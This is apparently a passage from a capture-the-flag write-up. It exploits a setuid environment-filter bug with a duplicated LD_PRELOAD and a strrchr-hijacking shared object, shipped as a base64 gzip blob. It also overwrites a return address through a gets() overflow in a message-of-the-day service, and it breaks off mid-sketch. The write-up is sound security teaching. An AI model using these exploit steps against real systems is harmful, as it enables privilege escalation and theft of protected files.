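Note that nothing in the loop rejects duplicate names; both FOO entries are kept.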

From here it seems that these strings of environmental variables will be passed into something like execve. BUT, take note of the following in the manual page.

The argv and envp arrays must each include a null pointer at the end of the array.

But if we look into the code, we see that there is no NULL terminator being added to the end of the environmental variable array.

If we look deeper into the code for the filter_env function we will notice where the bug can be exploited.

static void filter_env(void)
{
  char **p;

  for (p = unsafe; *p != NULL; p++) {
    if (getenv(*p) != NULL) {
      if (setenv(*p, "", 1) != 0)
	err(1, "setenv");
    }
  }

  /* just be safe, prevent heap spraying attacks */
  shuffle();
}

We can see via the following line of code: for (p = unsafe; *p != NULL; p++) that this filter function walks the unsafe list until it reaches that list’s terminating NULL, checking each unsafe name once. Remember, though, that the environ array we supplied has no NULL terminator of its own!

The code simply gets the environmental variable via getenv and, if it’s not NULL (meaning the variable exists in the environment), sets it to an empty string via setenv.

The problem with this is that both the getenv and setenv functions operate only on the first matching environment variable. This allows us to provide identical environmental variables, which causes the function to blank out the first one while the second one is left in the environment.
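
The effect is easy to see with a toy model. The Python 3 sketch below imitates the first-match behaviour described above using a plain list of NAME=value strings; it is a simplified model and not glibc’s actual implementation, and /tmp/exp.so is only a placeholder path for illustration.

```python
def getenv(environ: list, name: str):
    """Return the value of the FIRST entry matching name, or None."""
    prefix = name + "="
    for entry in environ:
        if entry.startswith(prefix):
            return entry[len(prefix):]
    return None


def setenv(environ: list, name: str, value: str) -> None:
    """Overwrite the FIRST entry matching name, or append a new one."""
    prefix = name + "="
    for i, entry in enumerate(environ):
        if entry.startswith(prefix):
            environ[i] = prefix + value
            return
    environ.append(prefix + value)


def filter_env(environ: list, unsafe: list) -> None:
    """Model of filter_env(): each unsafe name is blanked at most once."""
    for name in unsafe:
        if getenv(environ, name) is not None:
            setenv(environ, name, "")


if __name__ == "__main__":
    # Placeholder path; the same variable is supplied twice on purpose.
    env = ["LD_PRELOAD=/tmp/exp.so", "LD_PRELOAD=/tmp/exp.so"]
    filter_env(env, ["LD_PRELOAD"])
    print(env)
```

Only the first copy is cleared, so the second LD_PRELOAD entry is still present when id is executed.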

So to exploit this, let’s use LD_PRELOAD with a custom C function that hijacks a library call made by the application; once that function is called, our hijacked version will run and read the flag.

We know that the application calls /usr/bin/id in the main function, so let’s try hijacking id.

We will use ltrace against the id binary to trace its library calls, and then choose a library call to hijack.

root@kali:~/Google-CTF/Filter Env# ltrace id | head
is_selinux_enabled(1, 0x7ffca5dbbbc8, 0x7ffca5dbbbd8, 0x7f7cb3e98718)                                     = 0
strrchr("id", '/')                                                                                        = nil
setlocale(LC_ALL, "")                                                                                     = "en_US.UTF-8"
bindtextdomain("coreutils", "/usr/share/locale")                                                          = "/usr/share/locale"
textdomain("coreutils")                                                                                   = "coreutils"

Right away I notice that the C function strrchr is being called, so let’s hijack that function.

Let’s build a Shared Object file with the following contents that will be used for LD_PRELOAD. The C code simply reads the flag for us.

#include <stdio.h>
#include <stdlib.h>

void strrchr()
{
	FILE *fptr = fopen("/home/adminimum/flag", "rb");
	int c = fgetc(fptr); /* int, so EOF can be told apart from a data byte */
	while (c != EOF)
	{
		printf("%c", c);
		c = fgetc(fptr);
	}
	fclose(fptr);
	return 0;
}

Once done, let’s compile it.

root@kali:~/Google-CTF/Filter Env# gcc -shared exp.c -o exp.so
exp.c:4:6: warning: conflicting types for built-in function ‘strrchr’ [-Wbuiltin-declaration-mismatch]
 void strrchr()
      ^~~~~~~
exp.c: In function ‘strrchr’:
exp.c:14:9: warning: ‘return’ with a value, in function returning void
  return 0;
         ^
exp.c:4:6: note: declared here
 void strrchr()
      ^~~~~~~

To transport this file over to the server, we will gzip the file and then get the base64 output of it. We can then pass the base64 code over to the server, and unzip the file.

root@kali:~/Google-CTF/Filter Env# ls -la
total 32
drwxr-xr-x  2 root root  4096 Feb 24 17:25 .
drwxr-xr-x 12 root root  4096 Feb  8 22:42 ..
-rw-r--r--  1 root root   220 Feb 24 17:24 exp.c
-rwxr-xr-x  1 root root 16136 Feb 24 17:25 exp.so
-rw-r--r--  1 root root  2425 Nov 30  1979 filterenv.c
root@kali:~/Google-CTF/Filter Env# gzip exp.so 
root@kali:~/Google-CTF/Filter Env# ls -la
total 20
drwxr-xr-x  2 root root 4096 Feb 24 17:25 .
drwxr-xr-x 12 root root 4096 Feb  8 22:42 ..
-rw-r--r--  1 root root  220 Feb 24 17:24 exp.c
-rwxr-xr-x  1 root root 2083 Feb 24 17:25 exp.so.gz
-rw-r--r--  1 root root 2425 Nov 30  1979 filterenv.c
root@kali:~/Google-CTF/Filter Env# base64 exp.so.gz | tr -d '\n'
H4sICNYnc1wAA2V4cC5zbwDtW1tsG0UUnbXzsGmapNBCaItqEEilgk0opA2Ptk4TO1uUtKUkiFe13djr2JIfYb0Gh2dExSOqiioVJCQE/PABEqgV/BSBICiovH4A8QVCRECFI5BwP4DyQZaZ3bnrnfEuFCEQEnMi++49M2dmPDMb35XnPpQYTYYkCQHCaDsi3my348cpHxlwq2BuAEXx+3q0zq7bgoKhtLIW0XaJrtXj8/ZZibVend1fjPKcfROx1qtrI65M6e2s7Qs5diDE6kJUF6O62HbWzkusjVB5C30NcO2CvRSxFuZw7ykzTa576OfhbZDuJqxrQ2cPmO59tL+gealLrIXlIJrViOwXhEZ2T6DC0UMLLyyc2qjd8VXrL4WXP709+nk7qUc+bhQ15t+7doR/Zbrz2B+NM4df5waMP+bD3xVQPxXASwHt7A+of0VA/SR+XeLDT9jtdKD+VY6vQoGqThVKRbVsaoapqkjdNT6mpnVDn8qVTd0YHxvKl4r6uDaZ150y/xI1VdXUTK6o5XP36qhsGkYqa6BMaVovosyUbqbQdMVMZTXMpfKlso7yucmUXC7JW9DI6K6dQ+pmebPcj5x1CtF38oJ1lvBfFTX2S2VtLkrKH6Y+7BPY9330c/ZwfJ02MBBnefAXdzi2jY4AUPPwrR6+7uHbPfwZDx/x8D20n3bU2MMEMQ8f9vAbPbz3/1ufh/8r95uAgICAgICAgIDAfwHKwR8iyqHWL3vx5SPzZsj6WDn4bmTBLbf6v8ZF1mXf4veuDXF8RfwsKVpatDAu+5z4JKRe+tj2PyU+CeGX5m3/Q+KT0HrpuO0/jP3MEbf/w9teJ30fbn2VmGvPmGvwcJJ0OFFrsWvDLKm3QC2uP2fX7yftKJcvK+8sh5W5uvJObYcinVQ+WTZX4wbW0AYi1mKma8NwQz+7bRcuQpXeCeXgtp/JQ68yd8rsUA5t24T52n48wloWv51svRj70v4Frv+l+3DhBNbgievGo3iz0x7TCWxq3bhImUvUlUP4Nfderb5sWY8nrO/Xdr2VsLA/j30o+8wpm33AsiqLQB7D5JEPFuw1YVZBQEBAQEBAQEBAQEBAQODvwZhEvdlSQe/V0oVcMVeoFHozeW0KSevC15PfmMmDe6RuWXFsb8WWPPlfdNqyZql+NbXSvfuQVO2W1nW0R45Izu/T6/Fr/kfL2ksqdHYnO3tu7FpxT2QW7Vh7/aarL70E9PjxHNVwPe/vdUR7J349hfu0fzMd7Ox+NDS0si10O+7hH50SAQEBAQEBAQEBAQGB/wXg/Gbdc26aoEptB1Sk5Sup+yTVXQjF9PznOurDI9taauF86Hqu/Kdlq0TsAXoIFM58VunhTDhz+TgtP4f6T1C7Atqn1j3TGXcMnC09QC08v8IZ0guorbWwfLyFHeeL1Ea5/pYtZ/wxWt+iPsxjnfpttPxX6nvPnv6bgHPsPLbQ9U1Sewu1Ge4c78jQ0HWxjcP6ZE4rxgbkzXLflVdtudy5+rO+w3hWBkJ+fMhdf5YPu+vO8i3u/mD5VneeWb7NXR+Wb3fXmeUj7n5g+WjjYDTDn4NivvwKNO3Ld7j5Fiy/0r2vWL7T9xB6GHW5eQIs343ivvwq9z5l+XPd+5Plz/PdL2F8F8H5bZZf00ggYfjz3f3D8heguC/f08Q5eSCnLZ4n/59CPvPZSfnjHH8x5escv9XuozEeuH+T9nXz/BRoO33ces3Y9Zvn+emA8Qd9rufssm50IsaX+Nd/2R5P8/551W6nef7ftvnm9X3ffm/eV1/Qdvj1+s7mm9f9N3s8zfdLWPLPs+iR/PMsrpH88yluCGhnbwCfCmjfCKj/SED95yX/vA+UMsyyWclk5BRqpHWoZkFNkfSNMlLVdEmdypcmtbyaNktGWdUqVZQqFabzuqmn5a1Xb+73r0TyPXKqZhjajKoXTWMGZQytoKvpSqEwgyUeT8U1TaaqXp3GI1LV5L7BsYSa2D1Mck9I
g6SvcknNasU0SSwZvm334NiuIcyO7J5QEwoVKMP7MDU+NgTSkdE9OwdH1T3J5M2JcXV8cOdoArOkW8g8ice9mSZ/lOfipq/YqSqszk5m4ZpiM2jspBefzs4icYZVIbk8UzC1SWxNw7FZuCqWTF2eKlbkyUoun74yl0a2l9XKWSSnZ4pY6VjTcEru1o1yrlRkHBWXGXpeIxXp1XTeRLI9a+RSnirhC1Ov4nd7bWSjlNZMDcl6li5vNm00PEfqrLOjgGvcg1bIpRBp0enEaWeyXEYy3mwFvCv8du9fBonzSKwEX89B+W4A/uuUnMT7GcdCbnwWYi3o4Wue/wmApCeu8PQPcQLYuqdfyaOHb5Y4bRv0EE+AhfgSIHG+gpxYD/QQd4CFOBPGH+IsyRNb9ughPnFtwPgBaVoGeohjwEK8ys8ffP4i1e+kPsQ7YA949Gt89FXUyPGzweVzQlwN4Ne/zOkhfgK7l6vPp40+yOkhzgLLz1eEs49xeogfwK7mFpwP1w5zevjeBRvl6vOf/yjVu+FtjLV8BMTvv2c4fVDeaFD/L3F6iBfB3s/V5+fzNeTEWLC/3DxS2b8+P/8k/ujy6CG+6jlL/UfImXvQu3m6VA/5uS2cDtaR5DNKHj3Es4u9tJ0/6f8zTu/GP/QpyJM+7av/ktNDfDbQx9bj9YBvKAd6iMviAXp+/9Qoxz+0gf6iAL3X+jyaoQNUf4ZOPHn+vwI1//+Iesbuxa39jn2DGzA//lUB+vO2OvY0x/P63wE0Q3xeCD8AAA==

Once done, let’s put this file on the server.

cd /tmp
ls -la
total 4
drwxrwxrwt  2 user user   40 Feb 24 23:28 .
drwxr-xr-x 21 user user 4096 Oct 24 19:10 ..
echo "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" | base64 -d >> exp.so.gz
ls -la
total 8
drwxrwxrwt  2 user user   60 Feb 24 23:35 .
drwxr-xr-x 21 user user 4096 Oct 24 19:10 ..
-rw-r--r--  1 user user 2083 Feb 24 23:35 exp.so.gz

On the server we will use gunzip to extract the file.

gunzip exp*
ls -la
total 20
drwxrwxrwt  2 user user    60 Feb 24 23:35 .
drwxr-xr-x 21 user user  4096 Oct 24 19:10 ..
-rw-r--r--  1 user user 16136 Feb 24 23:35 exp.so
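
The transfer trick above (paste base64 text through the shell, decode it, then gunzip it) can be sketched end to end in Python. This is only an illustration: the payload bytes and the two helper names are placeholders, not the real exp.so.

```python
import base64
import gzip


def pack_for_paste(raw: bytes) -> str:
    """Compress a binary blob and return it as base64 text that survives copy/paste."""
    return base64.b64encode(gzip.compress(raw)).decode("ascii")


def unpack_from_paste(text: str) -> bytes:
    """Reverse the steps done on the server: base64 -d, then gunzip."""
    return gzip.decompress(base64.b64decode(text))


# Placeholder payload standing in for the compiled shared object.
payload = b"\x7fELF" + bytes(range(256)) * 4
text = pack_for_paste(payload)
restored = unpack_from_paste(text)

print(text[:4])             # gzip magic bytes 1f 8b 08 always encode to "H4sI"
print(restored == payload)  # the round trip is lossless
```

The "H4sI" prefix is a handy sanity check: the blob pasted into the echo command starts with the same four characters, which tells us it is gzip data before we even decode it.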

Awesome, from here we can navigate to the filterenv binary and execute it with our library loaded through LD_PRELOAD. This should give us the flag.

cd /home/adminimum
ls -la
total 40
drwxr-xr-x 2 nobody    nogroup    4096 Jun 14  2018 .
drwxr-xr-x 4 nobody    nogroup    4096 Jun  6  2018 ..
-rw-r--r-- 1 nobody    nogroup     220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 nobody    nogroup    3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 nobody    nogroup     655 May 16  2017 .profile
-rwsr-xr-x 1 adminimum adminimum 13648 Jun 14  2018 filterenv
-r-------- 1 adminimum adminimum    19 May 24  2018 flag
./filterenv
[*] waiting for new environment
LD_PRELOAD=/tmp/exp.so
LD_PRELOAD=/tmp/exp.so
LD_PRELOAD=/tmp/exp.so
LD_PRELOAD=/tmp/exp.so


CTF{H3ll0-Kingc0p3}
uid=1338(adminimum) gid=1337(user) groups=1337(user)

And just like that we got the flag!

FLAG: CTF{H3ll0-Kingc0p3}

Message of the Day

Upon reading the challenge description we learn that we got access to the Google-Haus smart hub. It seems that the system we are on provides the ability to print a “Message-of-the-day”. Alright, so I’m guessing we need to exploit something with the messages.

Let’s connect to the motd.ctfcompetition.com server on port 1337 and see what we have to work with.

root@kali:~/Google-CTF/Message Of The Day# nc motd.ctfcompetition.com 1337
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 

Alright, we notice that we have a few options: one pair to get and set the message for the user, and a matching pair to get and set the message for the admin.

Let’s go through the functionality to see what it does.

root@kali:~/Google-CTF/Message Of The Day# nc motd.ctfcompetition.com 1337
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 1
MOTD: Welcome back friend!
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 3
TODO: Allow admin MOTD to be set
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 4
You're not root!
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 2
Enter new message of the day
New msg: Testing
New message of the day saved!
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 1
Testing
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 2
Enter new message of the day
New msg: %x %x %x
New message of the day saved!
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 1
1 fffffd7d ffffffda

Awesome, so it seems we found a format string vulnerability in the code that prints the message of the day! At the same time, it seems we aren’t running as root, so we can’t read the admin message (and setting it is still a TODO), but that’s okay!
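
To probe a bug like this a bit more systematically, a message can be built from positional conversions such as %3$x, which glibc's printf accepts. The sketch below only generates such a message. The helper name build_probe is made up for illustration and is not part of the challenge.

```python
def build_probe(count, conversion="x"):
    """Return e.g. '%1$x.%2$x.%3$x' to print the first `count` printf arguments."""
    return ".".join("%{}${}".format(i, conversion) for i in range(1, count + 1))


print(build_probe(3))       # %1$x.%2$x.%3$x
print(build_probe(2, "p"))  # %1$p.%2$p
```

Sending the generated text as the new message and then reading it back should print one leaked value per conversion, separated by dots.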

Okay, with this in mind, let’s go ahead and download the attachment and extract the files. We should then be presented with the following binary.

root@kali:~/Google-CTF/Message Of The Day# ls
motd
root@kali:~/Google-CTF/Message Of The Day# file motd 
motd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=48025612558d041aa5521523e5e98194320d1fa4, not stripped

From here let’s open the binary up in IDA, press Shift+F12 to pull up the Strings window, and look for the “New message of the day saved!” string.

Once found, let’s double-click it, and in the next window highlight the string’s name and press x to list its cross references. From there, just follow the cross reference to where the string is used and we should see the following.

Right away I notice that printf is being used, which allows for format string exploits to occur!

But then I notice something else…

Notice that the vulnerable gets function is used, which doesn’t check buffer lengths. It seems that the destination buffer for our string is 100h, or 256 bytes, long. So if we can overflow the buffer, what can we do?

Well, we know that there is an option to read the admin message, so let’s dig into that to see if we can exploit it. We can start by looking for the “You’re not root!” string.

From here, simply follow the cross reference and we should see the following.

Right away we can see that this option calls the getuid function and compares it to 0 or root. If we are root, then the option calls the read_flag function and reads our flag, otherwise we get the not root message.

Okay, so we know we have a format string bug and a buffer overflow. Let’s see where the read_flag function is in memory, so that we can overwrite the saved return address (the value that ends up in RIP, the instruction pointer) with it and read the flag.

We can see that the function is at the memory address 606063A5. From here, let’s verify the security properties of the executable.

root@kali:~/Google-CTF/Message Of The Day# checksec motd
[*] '/root/Google-CTF/Message Of The Day/motd'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

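Awesome, so the binary is not position independent (no PIE), which means its code is loaded at a fixed address, and there are no stack canaries. That means we can attempt a buffer overflow and replace the saved return address with the address of the read_flag function. Let’s test this locally.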

I will be using PEDA with gdb to make looking at the exploit easier.

First off, let’s create a string of A’s that is 256 bytes long, followed by a string of B’s that is 8 bytes long. The B’s stand in for the address-sized value we want to inject. The reason the B’s are 8 bytes long is that this is an x64 binary, where addresses are 8 bytes long, and not x86, where they are 4 bytes long.

root@kali:~/Google-CTF/Message Of The Day# perl -e 'print "A"x256 . "B"x8'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB

Alright, now let’s start the application in gdb, select choice 2 to write a new message, and enter our generated string.

root@kali:~/Google-CTF/Message Of The Day# gdb -q ./motd
Reading symbols from ./motd...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /root/Google-CTF/Message Of The Day/motd 
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 2
Enter new message of the day
New msg: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB
New message of the day saved!

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x1e 
RBX: 0x0 
RCX: 0x7ffff7eca874 (<__GI___libc_write+20>:	cmp    rax,0xfffffffffffff000)
RDX: 0x7ffff7f9d8c0 --> 0x0 
RSI: 0x7ffff7f9c7e3 --> 0xf9d8c0000000000a 
RDI: 0x0 
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffe060 --> 0x7fffffffe178 --> 0x7fffffffe476 ("/root/Google-CTF/Message Of The Day/motd")
RIP: 0x60606300 (<main+167>:	fistp  WORD PTR [rdi-0x7c03ba77])
R8 : 0x7ffff7fa2500 (0x00007ffff7fa2500)
R9 : 0x7fffffffdfa0 ('A' <repeats 176 times>, "BBBBBBBB")
R10: 0x0 
R11: 0x246 
R12: 0x60606060 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe170 --> 0xa32 ('2\n')
R14: 0x0 
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x60606300 <main+167>:	fistp  WORD PTR [rdi-0x7c03ba77]
   0x60606306 <main+173>:	jge    0x60606304 <main+171>
   0x60606308 <main+175>:	add    BYTE PTR [rbp+0xe],dh
   0x6060630b <main+178>:	lea    rdi,[rip+0x2a9]        # 0x606065bb
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe060 --> 0x7fffffffe178 --> 0x7fffffffe476 ("/root/Google-CTF/Message Of The Day/motd")
0008| 0x7fffffffe068 --> 0x100000000 
0016| 0x7fffffffe070 --> 0x60606420 (<__libc_csu_init>:	push   r15)
0024| 0x7fffffffe078 --> 0x60606060 (<_start>:	xor    ebp,ebp)
0032| 0x7fffffffe080 --> 0x7fffffffe170 --> 0xa32 ('2\n')
0040| 0x7fffffffe088 --> 0x200000000 
0048| 0x7fffffffe090 --> 0x60606420 (<__libc_csu_init>:	push   r15)
0056| 0x7fffffffe098 --> 0x7ffff7e0409b (<__libc_start_main+235>:	mov    edi,eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000060606300 in main ()
gdb-peda$ 

Awesome, right away we notice that the RBP or Base Pointer has been overwritten. This is great for us because when a buffer overflow occurs on the stack, the first thing that it will overwrite is the saved RBP (base pointer), then the saved RIP (the return address), and then whatever lies above them in the caller’s frame. This occurs because the stack grows toward lower addresses, while gets fills the buffer toward higher addresses, which is where the saved values sit.

So if we add 4 more bytes of, let’s say, the C character (0x43 in hex), then we can overwrite the return address. Let’s test this.

gdb-peda$ r
Starting program: /root/Google-CTF/Message Of The Day/motd 
Choose functionality to test:
1 - Get user MOTD
2 - Set user MOTD
3 - Set admin MOTD (TODO)
4 - Get admin MOTD
5 - Exit
choice: 2
Enter new message of the day
New msg: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCC
New message of the day saved!

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x1e 
RBX: 0x0 
RCX: 0x7ffff7eca874 (<__GI___libc_write+20>:	cmp    rax,0xfffffffffffff000)
RDX: 0x7ffff7f9d8c0 --> 0x0 
RSI: 0x7ffff7f9c7e3 --> 0xf9d8c0000000000a 
RDI: 0x0 
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffe060 --> 0x7fffffffe178 --> 0x7fffffffe476 ("/root/Google-CTF/Message Of The Day/motd")
RIP: 0x43434343 ('CCCC')
R8 : 0x7ffff7fa2500 (0x00007ffff7fa2500)
R9 : 0x7fffffffdfa0 ('A' <repeats 176 times>, "BBBBBBBBCCCC")
R10: 0x0 
R11: 0x246 
R12: 0x60606060 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe170 --> 0xa32 ('2\n')
R14: 0x0 
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x43434343
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe060 --> 0x7fffffffe178 --> 0x7fffffffe476 ("/root/Google-CTF/Message Of The Day/motd")
0008| 0x7fffffffe068 --> 0x100000000 
0016| 0x7fffffffe070 --> 0x60606420 (<__libc_csu_init>:	push   r15)
0024| 0x7fffffffe078 --> 0x60606060 (<_start>:	xor    ebp,ebp)
0032| 0x7fffffffe080 --> 0x7fffffffe170 --> 0xa32 ('2\n')
0040| 0x7fffffffe088 --> 0x200000000 
0048| 0x7fffffffe090 --> 0x60606420 (<__libc_csu_init>:	push   r15)
0056| 0x7fffffffe098 --> 0x7ffff7e0409b (<__libc_start_main+235>:	mov    edi,eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000043434343 in ?? ()
gdb-peda$ 

Awesome, look at that! Our RIP is overwritten and we get a segmentation fault as the return address does not exist!
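
The two gdb runs above can be reproduced with a small model of the stack frame. This is a sketch under assumptions: the layout (256-byte buffer, then saved RBP, then saved RIP) is what the experiments suggest, and the original saved values below are hypothetical placeholders. Only the upper bytes of the return address (0x606063..) are taken from the gdb output.

```python
import struct

BUF_SIZE = 256  # the 100h-byte message buffer seen in IDA

# Hypothetical original values; the real ones were not shown in the write-up.
ORIG_RBP = 0x7FFFFFFFE080
ORIG_RIP = 0x6060633E


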